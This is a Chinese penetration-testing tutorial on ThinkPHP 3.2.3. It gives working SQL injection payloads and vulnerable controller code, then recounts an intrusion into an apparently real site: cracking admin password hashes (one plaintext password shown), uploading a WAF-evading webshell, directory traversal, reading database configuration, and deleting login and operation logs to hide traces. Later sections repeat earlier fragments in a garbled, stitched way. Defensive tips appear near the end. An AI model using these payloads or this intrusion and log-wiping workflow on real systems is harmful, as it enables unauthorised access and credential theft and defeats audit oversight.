ThinkPHP 3.2.3 渗透审计实战教学文档<\/h1>

前言<\/h2>
本文档基于ThinkPHP 3.2.3框架的渗透测试实战案例，详细分析该版本存在的多种安全漏洞及利用方式，包括SQL注入、RCE、XSS等漏洞的挖掘和利用过程。<\/p>

ThinkPHP 3.2.3 历史漏洞分析<\/h2>

1. WHERE注入漏洞<\/h3>

漏洞描述<\/strong>：当使用字符串方式作为where传参时存在SQL注入漏洞。<\/p>

利用方式<\/strong>：<\/p>

and<\/span> 1<\/span>=<\/span>updatexml(1<\/span>,concat(0<\/span>x7e,(user<\/span>()),0<\/span>x7e),1<\/span>)--+
<\/span><\/span><\/span><\/code><\/pre>2. EXP注入漏洞<\/h3>
漏洞描述<\/strong>：使用全局数组进行传参时存在注入（注意不能使用I方法过滤）。<\/p>
示例代码<\/strong>：<\/p>
public<\/span> function<\/span> getuser<\/span>(){
<\/span><\/span>    $User =<\/span> D<\/span>('User'<\/span>);
<\/span><\/span>    $map =<\/span> array<\/span>('id'<\/span> =><\/span> $_GET['id'<\/span>]);
<\/span><\/span>    $user =<\/span> $User-><\/span>where<\/span>($map)-><\/span>find<\/span>();
<\/span><\/span>    dump<\/span>($user);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>
id[0]=exp&id[1]==1 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))--+
<\/code><\/pre>
3. BIND注入漏洞<\/h3>
示例代码<\/strong>：<\/p>
public<\/span> function<\/span> getuser<\/span>(){
<\/span><\/span>    $data['id'<\/span>] =<\/span> I<\/span>('id'<\/span>);
<\/span><\/span>    $uname['username'<\/span>] =<\/span> I<\/span>('username'<\/span>);
<\/span><\/span>    $user =<\/span> M<\/span>('User'<\/span>)-><\/span>where<\/span>($data)-><\/span>save<\/span>($uname);
<\/span><\/span>    dump<\/span>($user);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>
id[0]=bind&id[1]=0 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))&username=fanxing
<\/code><\/pre>
4. FIND\/SELECT\/DELETE注入漏洞<\/h3>
示例代码<\/strong>：<\/p>
public<\/span> function<\/span> getuser<\/span>(){
<\/span><\/span>    $user =<\/span> M<\/span>('User'<\/span>)-><\/span>find<\/span>(I<\/span>('id'<\/span>));
<\/span><\/span>    dump<\/span>($user);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>
?id[where]=1 and 1=updatexml(1,concat(0x7e,(user()),0x7e),1)
<\/code><\/pre>
5. ORDER BY注入漏洞<\/h3>
示例代码<\/strong>：<\/p>
public<\/span> function<\/span> user<\/span>(){
<\/span><\/span>    $data['username'<\/span>] =<\/span> array<\/span>('eq'<\/span>,'admin'<\/span>);
<\/span><\/span>    $user =<\/span> M<\/span>('User'<\/span>)-><\/span>where<\/span>($data)-><\/span>order<\/span>(I<\/span>('order'<\/span>))-><\/span>find<\/span>();
<\/span><\/span>    dump<\/span>($user);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>
order=id and(updatexml(1,concat(0x7e,(select user())),0))
<\/code><\/pre>
6. 缓存漏洞<\/h3>
示例代码<\/strong>：<\/p>
public<\/span> function<\/span> test<\/span>(){
<\/span><\/span>    S<\/span>('name'<\/span>,I<\/span>('test'<\/span>));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>实战挖掘过程<\/h2>
1. SQL注入漏洞挖掘<\/h3>
发现点<\/strong>：后台功能中存在直接使用用户输入构造SQL查询的情况。<\/p>
利用条件<\/strong>：<\/p>

需要开启debug模式<\/li>
需要已登录后台<\/li>
<\/ul>
2. 后台RCE漏洞挖掘<\/h3>
发现点<\/strong>：<\/p>

模板管理功能存在代码执行漏洞<\/li>
附件管理功能存在上传漏洞<\/li>
<\/ol>
利用方式<\/strong>：<\/p>

通过模板编辑功能插入恶意代码<\/li>
通过附件上传功能上传webshell<\/li>
<\/ul>
3. 存储型XSS漏洞挖掘<\/h3>
发现点<\/strong>：<\/p>

后台登录日志功能<\/li>
后台操作日志的referer字段<\/li>
<\/ol>
限制<\/strong>：<\/p>

目标站点开启了HTTP-Only，无法直接窃取cookie<\/li>
<\/ul>
4. SSRF漏洞挖掘<\/h3>
说明<\/strong>：在实际站点中利用价值有限，未深入展开。<\/p>
实战渗透过程<\/h2>
1. 前台搜索框SQL注入<\/h3>
特点<\/strong>：目标站点自行实现了搜索功能，未使用框架原生方法，存在注入漏洞。<\/p>
2. 获取后台管理员账户<\/h3>
步骤<\/strong>：<\/p>

通过注入获取数据库中的管理员账户信息<\/li>
分析密码加密方式：md5($pass.md5($verify))<\/code><\/li>
获取到的数据示例：
# admin,admin1
# 19369424b3f933c41324978106c411cc,9509b82e3ddf251f2ea825b49ab6d291
# lnwkNC,XW7YXl
<\/code><\/pre>
<\/li>
<\/ol>
破解密码<\/strong>：<\/p>

使用cmd5查询已知哈希<\/li>
成功获取admin1账户密码：admin123!<\/li>
通过自定义字典爆破出其他管理员密码<\/li>
<\/ol>
3. 后台RCE利用<\/h3>
绕过WAF<\/strong>：<\/p>

哥斯拉webshell被拦截<\/li>
冰蝎webshell成功绕过WAF<\/li>
<\/ol>
目录穿越漏洞<\/strong>：<\/p>

通过修改模板功能实现目录穿越<\/li>
可修改根目录文件如\/install.php<\/li>
<\/ul>
4. 权限提升与信息收集<\/h3>
PHP函数执行<\/strong>：<\/p>
error_reporting<\/span>(E_ALL<\/span>);var_dump<\/span>(1<\/span>);
<\/span><\/span>var_dump<\/span>(scandir<\/span>('.'<\/span>));
<\/span><\/span>readfile<\/span>('web.config'<\/span>);
<\/span><\/span><\/code><\/pre>数据库信息获取<\/strong>：<\/p>
'DB_TYPE'<\/span> =><\/span> 'mysql'<\/span>, 
<\/span><\/span>'DB_HOST'<\/span> =><\/span> '180.xxx'<\/span>, 
<\/span><\/span>'DB_NAME'<\/span> =><\/span> 'xxx'<\/span>, 
<\/span><\/span>'DB_USER'<\/span> =><\/span> 'xxx'<\/span>, 
<\/span><\/span>'DB_PWD'<\/span> =><\/span> 'xxx'<\/span>, 
<\/span><\/span>'DB_PORT'<\/span> =><\/span> '3306'<\/span>, 
<\/span><\/span>'DB_PREFIX'<\/span> =><\/span> 'wexxx'<\/span>,
<\/span><\/span><\/code><\/pre>系统信息<\/strong>：<\/p>

站库分离架构<\/li>
Linux系统<\/li>
当前账户权限较低<\/li>
<\/ul>
5. 痕迹清除<\/h3>
操作<\/strong>：<\/p>
select<\/span> *<\/span> from<\/span> XXX.operationlog limit<\/span> 10<\/span>
<\/span><\/span>DELETE<\/span> FROM<\/span> XXX.rationlog WHERE<\/span> id ><\/span> 7000<\/span>
<\/span><\/span>DELETE<\/span> FROM<\/span> XXX._loginlog WHERE<\/span> id ><\/span> 3000<\/span>
<\/span><\/span>unlink('test.php'<\/span>);
<\/span><\/span><\/code><\/pre>防御建议<\/h2>

升级ThinkPHP至最新安全版本<\/li>
对所有用户输入进行严格过滤<\/li>
使用框架提供的I方法进行输入过滤<\/li>
关闭debug模式<\/li>
限制后台访问IP<\/li>
加强密码策略，使用强密码<\/li>
定期审计代码，特别是自定义功能模块<\/li>
设置文件上传严格限制<\/li>
实施最小权限原则<\/li>
<\/ol>
总结<\/h2>
本案例展示了从代码审计到实际渗透的完整过程，重点分析了ThinkPHP 3.2.3版本的多种安全漏洞及其利用方式。渗透测试人员应掌握这些漏洞原理，而开发人员则应引以为戒，加强应用安全防护。<\/p>

ThinkPHP 3.2.3 渗透审计实战教学文档<\/h1>

前言<\/h2> 本文档基于ThinkPHP 3.2.3框架的渗透测试实战案例，详细分析该版本存在的多种安全漏洞及利用方式，包括SQL注入、RCE、XSS等漏洞的挖掘和利用过程。<\/p>

ThinkPHP 3.2.3 历史漏洞分析<\/h2>

实战挖掘过程<\/h2>

4. SSRF漏洞挖掘<\/h3> 说明<\/strong>：在实际站点中利用价值有限，未深入展开。<\/p>

1. 前台搜索框SQL注入<\/h3> 特点<\/strong>：目标站点自行实现了搜索功能，未使用框架原生方法，存在注入漏洞。<\/p>

总结<\/h2> 本案例展示了从代码审计到实际渗透的完整过程，重点分析了ThinkPHP 3.2.3版本的多种安全漏洞及其利用方式。渗透测试人员应掌握这些漏洞原理，而开发人员则应引以为戒，加强应用安全防护。<\/p>

前言<\/h2>
本文档基于ThinkPHP 3.2.3框架的渗透测试实战案例，详细分析该版本存在的多种安全漏洞及利用方式，包括SQL注入、RCE、XSS等漏洞的挖掘和利用过程。<\/p>

4. SSRF漏洞挖掘<\/h3>
说明<\/strong>：在实际站点中利用价值有限，未深入展开。<\/p>

1. 前台搜索框SQL注入<\/h3>
特点<\/strong>：目标站点自行实现了搜索功能，未使用框架原生方法，存在注入漏洞。<\/p>

总结<\/h2>
本案例展示了从代码审计到实际渗透的完整过程，重点分析了ThinkPHP 3.2.3版本的多种安全漏洞及其利用方式。渗透测试人员应掌握这些漏洞原理，而开发人员则应引以为戒，加强应用安全防护。<\/p>